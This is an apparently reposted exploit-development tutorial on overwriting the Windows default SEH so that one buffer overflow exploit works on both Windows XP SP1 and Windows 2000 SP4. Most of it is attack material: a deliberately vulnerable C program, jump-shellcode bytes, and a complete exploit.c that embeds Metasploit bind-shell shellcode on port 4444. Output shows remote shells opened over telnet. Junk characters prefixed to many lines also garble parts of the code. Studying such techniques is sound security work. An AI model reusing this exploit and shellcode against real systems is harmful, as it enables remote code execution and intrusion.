Exploiting Default Exception Handler to Increase Exploit Sta

韩冰

The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.

( q- P7 u, ?# s& y+ g5 W[Buf] <- Shellcode
[Return Address] <- jmp register (for Windows XP sp1)
6 p0 V1 q  v' y/ a[Various Stack Data] <- Junk
& h; O* x4 \+ W& T! o[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
[SE Handler] <- jmp register (for Win2k sp4)
6 w7 `- y+ C7 h6 s' [3 A3 z[Stage1 Shellcode] <- stage1 shellcode for win2k

0 k/ d7 M9 \2 y( ~0 jIf the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses
. b( _4 ~4 X/ B% `
Necessary Tools:
- OllyDBG
- C/C++ Compiler
7 H! F2 j4 L  a- nasm
$ o  k# T% i+ j, P6 Z/ B2 A6 I- Sac

Vulnerable Code:
. M9 B" T4 U* H1 L  C//lamebuf.c
#include<stdio.h>
8 @% Y$ @6 h' K2 c0 c% I) @8 s6 d#include<string.h>
$ C0 s& D: D5 ^2 q, z- V#include<windows.h>
# g0 K6 |% b4 l5 E9 Bint main(int argc,char *argv[]){

char buf[512];
char buf1[1024]; // <- simulate a stack
//DebugBreak();
1 x2 k2 M! o/ p- @6 P2 q+ xif (argc != 2){ return -1; }
1 s6 d  p- q' K& a+ g- m6 n
strcpy(buf,argv[1]);
/ V2 o( B, a0 H1 n  s( greturn 0x0;
}
& S1 b5 r$ c$ B( N
Getting Started:
# H6 a% z' K9 F! r$ R. d) m0 v6 ZBefore writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:
# T4 ^, [7 {. r5 o! ]# e- q
( h6 e# F; M2 X5 k6 o# }, _% YEAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
( T  U# r! W1 ~9 w5 ~+ M) |1 D+ @* Q# jESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
8 L- j: E9 W) L4 H+ sEDI 77F59037 ntdll.77F59037
2 N& A3 X. m0 `' M; `EIP 41414141

2 Q/ I! \3 h/ [5 d& uLets take a look at the stack and see what happened to the default exception handler:
0x0012FFB0 41414141 Pointer to next SEH Record
8 w5 e5 q4 p" s4 |7 r2 N& Y! a0x0012FFB4 41414141 SE Handler

8 d( K5 \0 i% W1 C2 h$ e0 @" TWe successfully overwrote the return address and the default exception handler.
  c/ z' L* v  e- C
8 U2 e, i& H7 }4 b" K) c/ tPrimary Return Address (Windows XP SP1 EN):
The first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

* x1 W; Q9 E7 c; y6 Y, S8 L1 f9 bSecondary Return Address (Windows 2000 SP4 EN):
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"

$ g3 O( Z/ a2 X# T! ^: J) _Proof Of Concept:
- T" s" w* I6 ]( Q6 M3 [// exploit.c
// Tal zeltzer - [Double Return] //

+ Y4 \; F, `- p  n#include<stdio.h>
#include<string.h>
#include<windows.h>

#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English
* l: m; g+ v: x5 I* o  R( M% eunsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English
, ]! ]. H  d& s* N$ Xunsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";
9 U0 I& }9 T+ H$ r) {
// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com
+ L! j( p) i9 d" W4 l$ B( D8 B6 o2 yunsigned char shellcode[] =
5 g* T2 I4 b; ?"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
( g+ f, h& R; D0 U4 }"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
$ x$ U) [, ?2 [' \"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
. R2 f: u# j, b# q  i6 U"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
2 R- b+ Z# U; E" S5 l) r( v  B"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
" w9 D9 O2 R% W' s* D) I"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
4 L& F( u) g% j' u8 {& Z, y: ?"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
" p7 k& s! r) r2 N& M"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
0 j) V- E, }' {"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
$ O3 H  N% s: r" U"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
, N  R/ H$ z3 T- z6 i8 N0 A"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
% g! ^" |# w) l2 v" m6 m: k"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
1 K1 U. `+ m, K1 T"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
3 g4 m. {/ g3 k5 J4 c"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
8 M1 ?. `0 f2 M0 Z1 S  X

) V/ l0 F, s9 {) S- F' a6 Gint main(int argc,char *argv[]){

char *bufExe[3];
& a- `. y% z$ M* M. uchar buf[2048];
bufExe[0] = "lamebuf.exe";
bufExe[2] = NULL;

: ^) f& D: H- jmemset(buf,0x0,sizeof(buf));
. t  n9 |# w/ Ymemset(buf,0x90,1652);
memcpy(&buf[24],shellcode,sizeof(shellcode)-1);

7 C+ A! l" q& `/ R" Zmemcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode

*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
$ K6 i# p1 A' F2 ]; }8 v*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en
( s  m4 X1 ~9 C4 o" h

  K$ K( x' \; J, N/ H) UbufExe[1] = buf;
//Execute the vulnerable application
4 p' P; |& {" N0 i) u) P* f) e( Iexecve(bufExe[0],bufExe,NULL);

return 0x0;
: q- Y3 G0 Q4 C6 T  @$ v3 r}
. k% y; M2 w3 j
Exploit under Windows XP SP1:
3 H* j- V8 }7 E7 G9 {; J* FC:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Exploit under Windows 2000 SP4:
9 C+ x) M  ]1 H1 f7 g' fC:\>exploit
C:\>
3 W3 l; j% f; S- \$ V# x( e; v- R1 d7 qC:\>telnet 127.0.0.1 4444

. }: J$ l; `7 D. x& N8 zMicrosoft Windows 2000 [Version 5.00.2195]
# W% A8 h' u# Q8 l0 W(C) Copyright 1985-2000 Microsoft Corp.